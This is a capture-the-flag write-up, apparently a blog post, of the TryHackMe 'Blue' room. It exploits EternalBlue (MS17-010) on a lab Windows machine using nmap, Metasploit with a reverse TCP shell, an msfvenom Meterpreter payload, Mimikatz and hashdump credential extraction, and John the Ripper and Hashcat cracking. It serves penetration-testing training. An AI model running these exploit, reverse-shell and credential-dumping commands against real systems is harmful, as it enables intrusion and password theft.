THM-EternalBlue -Write Up

Mohamed Ali
3 min readJul 21, 2024

--

Deploy & hack into a Windows machine, leveraging common misconfigurations issues.

Find This Room: Blue

What Is EternalBlue

EternalBlue is a vulnerability in the SMBv1 (Server Message Block) protocol that allows remote command execution.

This vulnerability was discovered in Windows 7 and Windows Server 2008. The vulnerability has been widely exploited by ransomware such as WannaCry.

1- Recon

Determining the goal :
Specify the IP address of the target device.

OS :
If you know the type of operating system, this will help you determine how to take advantage of the vulnerability.

You can use tools like nmap or netcat to collect this information.

SMB port analysis
Port scanning using nmap

Determine port status:

nmap -p 445 <target_ip>

Full scan :

To look for additional details, you can scan all ports and see what services and applications are running on the device.

nmap -p 1-65535 -T4 -A -v <target_ip>

Options :

-p 1–65535: Scan all ports.
-T4 : Speed ​​up scanning.
-A : Activate system and service discovery.
-v: Show details.

Verify the vulnerability
Use Metasploit

Select the appropriate tool:
Open Metasploit Console and use EternalBlue’s custom exploit.

2- Gain Accsess

Start Metasploit

msfconsole

Exploitation code we will run against the machine.

msf6 exploit(windows/smb/ms17_010_eternalblue) >
set LHOST <Your_IP>
set RHOST <Target_IP>
set PAYLOAD windows/x64/shell/reverse_tcp

Vulnerability verification :

Check if the device is vulnerable to exploitation.

msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.1.10
RHOSTS => 192.168.1.10
msf6 exploit(windows/smb/ms17_010_eternalblue) > check
[*] 192.168.1.10:445 - The target is vulnerable.

Implementation of exploitation:

If the device is vulnerable, you can perform the exploit to gain access to the device.

exploit

3- Esclate

Escalate privileges, learn how to upgrade shells in metasploit.

Background the previously gained shell (CTRL + Z)

Convert a command shell to a Meterpreter shell in Metasploit

1- Using the sessions -u Command:

  • After gaining a shell session on the target machine, you can use the sessions command to upgrade it to a Meterpreter session. First, list your active sessions to find the session ID:
sessions

Once you have the session ID (e.g., 1), run the following command to upgrade the shell session to Meterpreter:

sessions -u 1

2- Using the shell_to_meterpreter Post-Exploit Module:

  • Metasploit provides a specific post-exploit module designed to upgrade a shell to Meterpreter. Load the module and set the session ID you want to upgrade:
use post/multi/manage/shell_to_meterpreter
set SESSION 1
exploit

This method will automatically select the best Meterpreter payload based on the target platform.

3- Manual Payload Injection:

  • If you prefer a more hands-on approach, you can manually inject a Meterpreter payload into the shell. Generate a Meterpreter payload using msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f exe > meterpreter.exe

Transfer this payload to the target machine using your command shell, and execute it to establish a Meterpreter session.

4- Cracking

1-Fetch saved passwords in Windows
Using Mimikatz with Meterpreter

Download Mimikatz in session:
After getting a Meterpreter session, you can download Mimikatz.

meterpreter > load mimikatz

Using Mimikatz to fetch passwords:

After downloading Mimikatz, use the kiwi command to fetch the passwords.

meterpreter > kiwi_cmd kerberos::list /export

Extract passwords :

Use the following command to extract plain text passwords from memory.

meterpreter > creds_all

Use post/windows/gather/hashdump

Select session:
After obtaining the Meterpreter session, use the hashdump module to fetch the password hashes.

meterpreter > use post/windows/gather/hashdump
meterpreter > set SESSION 1
meterpreter > run

2- Decrypt password hashes
Use John the Ripper

Download John the Ripper:
Make sure you have downloaded and installed John the Ripper.

Save hashes to a file:
Save the hashes you obtained from hashdump to a text file, such as hashes.txt.

Run John the Ripper:
Use John the Ripper to decrypt the hashes.

john --format=NT hashes.txt

Use Hashcat

Download Hashcat:
Make sure you have downloaded and installed Hashcat.

Run Hashcat:
Use Hashcat to decrypt hashes.

hashcat -m 1000 -a 0 hashes.txt /path/to/wordlist.txt

Happy Hacking

Follow Me :

Support

patreon.com/mosec

--

--

Mohamed Ali
Mohamed Ali

No responses yet